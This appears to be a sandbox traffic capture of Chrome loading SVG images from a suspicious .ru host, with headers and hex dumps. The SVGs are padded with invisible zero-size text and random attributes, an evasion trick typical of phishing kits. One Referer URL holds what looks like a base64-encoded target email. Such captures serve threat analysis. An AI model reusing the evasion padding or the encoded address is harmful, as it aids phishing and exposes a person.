                                                                                                                                                              2024-01-17 16:39:32 UTC782OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6RUb6zvmV0n/6rUQnzSbGLvo HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/0RmbxrqCaeunUcWxgrzYOh?61fb416f2fa21vcmFuQG1vb2cuY29t
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:33 UTC696INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:33 GMT
                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S8W0yMzg46ulofkXM3GHmogELMyg0B5xB9bJc4zw38g%2FtJhknijOFIHGMNcvx8stiTmgj4l0BN8u5XAcweuZPG21rFmSBebtBWED7z1oQxScw%2BleWy1zKj6q8n84AVIV5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008ef4df34271-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:33 UTC673INData Raw: 39 63 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 39 22 20 68 65 69 67 68 74 3d 22 35 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 36 20 34 34 22 3e 3c 64 65 66 73 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 54 4b 6b 54 37 36 75 66 46 63 55 6c 32 4a 39 61 68 7a 69 66 34 63 43 78 6c 67 6a 4c 3c 2f 74 65 78 74 3e 3c 73 70 61 6e 20 73 74 79 6c 65
                                                                                                                                                              Data Ascii: 9c9<svg xmlns="http://www.w3.org/2000/svg" width="49" height="50" viewBox="0 0 46 44"><defs><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">TKkT76ufFcUl2J9ahzif4cCxlgjL</text><span style
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6d 33 56 49 68 47 44 6f 41 33 50 49 3c 2f 73 70 61 6e 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 35 22 20 68 65 69 67 68 74 3d 22 35 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c 31 2c 31 39 2c 33 30 61 31 30 2e 39 2c 31 30 2e 39 2c 30 2c 30 2c 31 2d 35 2e 35 34 37 2d 31 2e 35 2c 31 31 2e 31 30 36 2c 31 31 2e 31
                                                                                                                                                              Data Ascii: (26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">m3VIhGDoA3PI</span><rect class="a" width="45" height="52"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.1
                                                                                                                                                              2024-01-17 16:39:33 UTC470INData Raw: 2c 32 2c 30 2c 30 2c 31 2d 2e 36 32 35 2d 2e 34 32 32 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2d 2e 34 33 38 2d 2e 36 34 31 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 34 2c 31 36 61 31 2e 39 33 38 2c 31 2e 39 33 38 2c 30 2c 30 2c 31 2c 2e 31 35 36 2d 2e 37 38 31 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 34 32 32 2d 2e 36 32 35 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2c 2e 36 34 31 2d 2e 34 33 38 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 36 2c 31 34 5a 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68
                                                                                                                                                              Data Ascii: ,2,0,0,1-.625-.422,2.191,2.191,0,0,1-.438-.641A1.705,1.705,0,0,1,14,16a1.938,1.938,0,0,1,.156-.781,2,2,0,0,1,.422-.625,2.191,2.191,0,0,1,.641-.438A1.705,1.705,0,0,1,16,14Z"/><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-h
                                                                                                                                                              2024-01-17 16:39:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              47192.168.2.449808172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:33 UTC476OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/632Jy30VDgVHr39mjZbPAQ/3u0Xn2q2wkzfexbzQNTGlXRdtH HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:33 UTC698INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:33 GMT
                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B7dE6FaEgBZeTDc6cb01OyTZYxiaqZGj7Edah8tU0m%2Fp4l4QP0ko77WviAatQ9%2FZlGfgEdFDOf8FJRKp12P4pKdVblt%2BnY8FoOxGE0EgRZWOLenV6b37US2LLtCdVj25Tg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008f33d2a0fa1-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:33 UTC671INData Raw: 34 62 62 0d 0a 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 52 61 4e 74 79 6b 4f 61 6e 46 41 47 31 33 6b 6c 63 3c 2f 73 70 61 6e 3e 3c 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69
                                                                                                                                                              Data Ascii: 4bb<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">RaNtykOanFAG13klc</span><title><span style="di
                                                                                                                                                              2024-01-17 16:39:33 UTC547INData Raw: 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6a 68 48 4f 65 64 73 44 34 6a 45 33 61 3c 2f 73 70 61 6e 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 39 34 34 2c 37 2e 30 35 36 6c 2e 35 39 34 2e 35 39 34 4c 37 2e 36 31 37 2c 31 31 2e 35 37 38 48 31 38 76 2e 38 34 34 48 37 2e 36 31 37 6c 33 2e 39 32 31 2c 33 2e 39 32 38 2d 2e 35 39 34 2e 35 39 34 4c 36 2c 31 32 6c 34 2e 39 34 34 2d 34 2e 39 34 34 6d 30 2d 2e 31 34 31 2d 2e 30 37 31 2e 30 37 4c 35 2e 39 32 39 2c 31 31 2e 39 32 39 2c 35 2e 38 35 38 2c 31 32 6c 2e 30 37 31 2e 30 37 31 2c 34 2e 39 34 34 2c 34
                                                                                                                                                              Data Ascii: r: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">jhHOedsD4jE3a</span><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4
                                                                                                                                                              2024-01-17 16:39:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              48192.168.2.449809172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:33 UTC451OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6RUb6zvmV0n/6rUQnzSbGLvo HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:33 UTC698INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:33 GMT
                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3vkl68iJVhFATnvikvyTJI3XN2Mb0eEY5Q0uNo4uGBH2ndbz1GKE0sYPptM%2F0Q1ruwTZnhPx5YfXMJQYYZr%2BsQHs82k7O4D7eQZX3j7p3YOI4LHIHsLdKHz0%2FYqmS6Qkvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008f3498118bc-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:33 UTC671INData Raw: 39 63 36 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 39 22 20 68 65 69 67 68 74 3d 22 35 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 36 20 34 34 22 3e 3c 64 65 66 73 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 30 6a 4c 50 38 4e 49 57 6b 4b 31 70 66 74 72 6e 4e 73 54 57 62 53 7a 43 76 5a 68 6e 39 3c 2f 74 65 78 74 3e 3c 73 70 61 6e 20 73 74 79 6c
                                                                                                                                                              Data Ascii: 9c6<svg xmlns="http://www.w3.org/2000/svg" width="49" height="50" viewBox="0 0 46 44"><defs><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">0jLP8NIWkK1pftrnNsTWbSzCvZhn9</text><span styl
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 79 38 35 54 59 6e 4a 6e 38 30 39 64 6e 76 3c 2f 73 70 61 6e 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 35 22 20 68 65 69 67 68 74 3d 22 35 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c 31 2c 31 39 2c 33 30 61 31 30 2e 39 2c 31 30 2e 39 2c 30 2c 30 2c 31 2d 35 2e 35 34 37 2d 31 2e 35 2c 31 31 2e 31 30 36 2c 31 31 2e
                                                                                                                                                              Data Ascii: 26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">y85TYnJn809dnv</span><rect class="a" width="45" height="52"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.
                                                                                                                                                              2024-01-17 16:39:33 UTC469INData Raw: 32 2c 32 2c 30 2c 30 2c 31 2d 2e 36 32 35 2d 2e 34 32 32 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2d 2e 34 33 38 2d 2e 36 34 31 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 34 2c 31 36 61 31 2e 39 33 38 2c 31 2e 39 33 38 2c 30 2c 30 2c 31 2c 2e 31 35 36 2d 2e 37 38 31 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 34 32 32 2d 2e 36 32 35 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2c 2e 36 34 31 2d 2e 34 33 38 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 36 2c 31 34 5a 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d
                                                                                                                                                              Data Ascii: 2,2,0,0,1-.625-.422,2.191,2.191,0,0,1-.438-.641A1.705,1.705,0,0,1,14,16a1.938,1.938,0,0,1,.156-.781,2,2,0,0,1,.422-.625,2.191,2.191,0,0,1,.641-.438A1.705,1.705,0,0,1,16,14Z"/><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-
                                                                                                                                                              2024-01-17 16:39:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              49192.168.2.449810172.67.148.1314434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:33 UTC469OUTGET /ISbmQkYiPFfuvaTUHaSOQaFdxrqdrGZuSKaPjbFuAR/6ei9bANZ0chH/5yGHYxSRxnr32lWFLaZnuzyZ2fRMM HTTP/1.1
                                                                                                                                                              Host: 2r1.nhvw4is.ru
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: PHPSESSID=9rsspirnck07p4qv0mg9onj4gq
                                                                                                                                                              2024-01-17 16:39:33 UTC700INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:33 GMT
                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                              pragma: no-cache
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dAPWu131pXkcikG64nr8rDlOjbYZFBp7Kk2v%2F6BxuIGQy%2BUrZCABRAIH78NP5tCHHbb5z1djQT3zS4H4zzANU3MTcnwLo97oG98QJeRBdpHAfltVpo%2BsnngY3kRpFaUc%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 847008f36bce78df-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              2024-01-17 16:39:33 UTC669INData Raw: 31 38 37 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 36 2e 35 22 20 67 72 57 62 75 52 69 64 66 66 61 3d 22 41 70 6f 76 55 6f 66 4e 45 45 41 6a 62 76 59 4f 56 68 64 51 47 58 73 72 63 63 56 22 20 20 68 65 69 67 68 74 3d 22 32 32 22 3e 3c 70 61 74 68 20 4e 6d 5a 64 49 71 6c 47 74 6a 47 4f 4d 4f 4c 54 73 7a 6b 66 7a 4b 63 76 72 3d 22 4b 51 41 67 71 6b 67 5a 68 57 69 4e 5a 51 61 77 50 62 56 79 73 50 5a 62 22 20 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32
                                                                                                                                                              Data Ascii: 1873<svg xmlns="http://www.w3.org/2000/svg" width="106.5" grWbuRidffa="ApovUofNEEAjbvYOVhdQGXsrccV" height="22"><path NmZdIqlGtjGOMOLTszkfzKcvr="KQAgqkgZhWiNZQawPbVysPZb" d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H2
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 34 2e 37 30 37 2c 34 2e 37 30 37 2c 30 2c 30 2c 31 2d 34 2e 39 31 38 2d 34 2e 39 30 38 2c 35 2e 36 34 31 2c 35 2e 36 34 31 2c 30 2c 30 2c 31 2c 31 2e 34 2d 33 2e 39 33 32 2c 35 2e 30 35 35 2c 35 2e 30 35 35 2c 30 2c 30 2c 31 2c 33 2e 39 35 35 2d 31 2e 35 34 35 2c 35 2e 34 31 34 2c 35 2e 34 31 34 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 31 36 38 2c 34 2e 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31
                                                                                                                                                              Data Ascii: 4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.41
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 2c 30 2c 2e 33 37 35 2d 2e 37 34 31 2c 31 2e 30 32 39 2c 31 2e 30 32 39 2c 30 2c 30 2c 30 2d 2e 33 39 2d 2e 38 31 33 2c 35 2e 37 36 38 2c 35 2e 37 36 38 2c 30 2c 30 2c 30 2d 31 2e 34 37 37 2d 2e 37 36 35 2c 34 2e 35 36 34 2c 34 2e 35 36 34 2c 30 2c 30 2c 31 2d 31 2e 38 32 39 2d 31 2e 32 31 33 2c 32 2e 36 35 35 2c 32 2e 36 35 35 2c 30 2c 30 2c 31 2d 2e 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37
                                                                                                                                                              Data Ascii: ,0,.375-.741,1.029,1.029,0,0,0-.39-.813,5.768,5.768,0,0,0-1.477-.765,4.564,4.564,0,0,1-1.829-1.213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.97
                                                                                                                                                              2024-01-17 16:39:33 UTC1369INData Raw: 33 34 31 2c 33 2e 33 34 31 2c 30 2c 30 2c 31 2d 2e 37 33 36 2d 32 2e 33 36 33 5a 22 20 20 61 67 41 44 73 6b 79 6f 58 74 3d 22 52 70 42 42 6c 51 68 4a 67 42 6e 22 20 20 66 69 6c 6c 3d 22 23 36 36 36 36 36 36 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 76 77 44 45 4c 56 70 64 4a 75 76 42 43 4f 75 4e 66 75 4f 59 57 63 6c 78 6b 3c 2f 74 65 78 74 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 38 22 20 20 57 64 4b 66 59 54 4c 49 6d 42 59 3d 22 48 47 42 65 67 67 79 61 6c 64 61 50 72 6c 68 68 6e 75 6e
                                                                                                                                                              Data Ascii: 341,3.341,0,0,1-.736-2.363Z" agADskyoXt="RpBBlQhJgBn" fill="#666666"/><text style="display: inline;color: #1A7D75;max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">vwDELVpdJuvBCOuNfuOYWclxk</text><rect x="12.068" WdKfYTLImBY="HGBeggyaldaPrlhhnun
